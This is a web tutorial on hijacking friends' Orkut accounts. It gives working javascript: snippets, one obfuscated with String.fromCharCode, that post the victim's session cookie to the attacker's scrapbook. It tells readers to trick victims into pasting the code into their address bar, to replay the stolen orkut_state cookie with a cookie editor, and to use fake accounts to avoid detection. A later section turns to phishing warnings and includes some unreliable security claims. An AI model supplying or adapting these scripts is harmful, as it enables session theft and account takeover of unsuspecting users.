ORKUT HACKING: How to hack Friends orkut accounts

First get firefox and the cookie editor plugin for it...they will be required in this operation.

Then make two fakeaccounts...u will ned one to receive the cookie and one to advertise your script so that if orkut starts deleting such profiles your real account wont be compromised.Its your choice.

javascript:nobody=replyForm;nobody.toUserId.value=62915936;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()

U see the 62915936 part? Thats the one u need to edit to get the cookie to your account.....

Now here is the script Code:

HOW TO PUT UR NUMBER IN THAT SECTION??? FOLLOW THESE STEPS:

1) Go to YOUR ALBUM section.

2) Go to ANY photo and right click on it , see the properties of your display image...u will see something like 12345678.jpg

3) There will be a eight digit value.

4) Now put that value in the above javascript.

5) Thats it.

Now your javascript will look like:

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval
(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,
111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';
nobody.submit()

Now give this script to the victim , ask him to go to his scrap book and paste this script in his address bar and press enter. now you ll get his cookies in your scrapbook.

Now after getting a cookie...

1) Go to your home page

2) Open the cookie editor plugin(TOOLS-->COOKIE EDITOR).

3) Type orkut in the text box and click filter/refresh.look for orkut_state cookie.

4) Just double click it and replace the orkut_state part with your victims. No need to change the _umbz _umbc part...

5) THATS IT!!

ANOTHER SCRIPT : (100%working)

javascript:nobody=replyForm;nobody.toUserId.value=53093255;

nobody.scrapText.value=document.cookie;nobody.

action='scrapbook.aspx?Action.submit';nobody.submit()

Put ur eight digit number in the place of (53093255)

Google uses a 4 Level Orkut login which makes it difficult to hack using brute force attack.

First Level Security-SSL or 128 bit secured connection

Second Level Google account checks for cookie in the sytem of user

Third Level Google provides a redirection to the entered User information

Fourth Level Google doesn't use conventional php/aspx/asp coding so impossible to attack using input validation attack!!!

It is not an easy task to break this security! But still some people manages to get access to other accounts. The question concerned is How they do it? Many of them just use simple tricks that befool users and then they themself leak out their password. Here are some points you need to take care of, to prevent your Orkut account being hacked!

Phishing Attack is the most popular way of stealing other's password.By using fake login pages. The users land on a page where they are asked for their login information and they enter their username and password thinking it to be a real page but actually it is other way round. It submits all the details entered to the programmer or the coder.

Orkut New Features: I have come across a page that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When user submit the page, there goes his ID and password mailed to the coder.

Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT notORKUT. Clicking on this link will take you to a fake login page and there you loose up your password.

Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it.

Primary mail address: If by some means a hacker came to know password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on 'forget password'.This way Google will send link to the already hacked primary email id to change the password of the Orkut account. Hence the email hacker will change your Orkut account's password. Hence your Orkut account hacked too.

So a better thing would be to keep a very unknown or useless email id of yours as primary email id so that if the hacker clicks on 'Forgot password' the password changing link goes to an unknown email id i.e. not known to the hacker.Hence your Orkut account saved.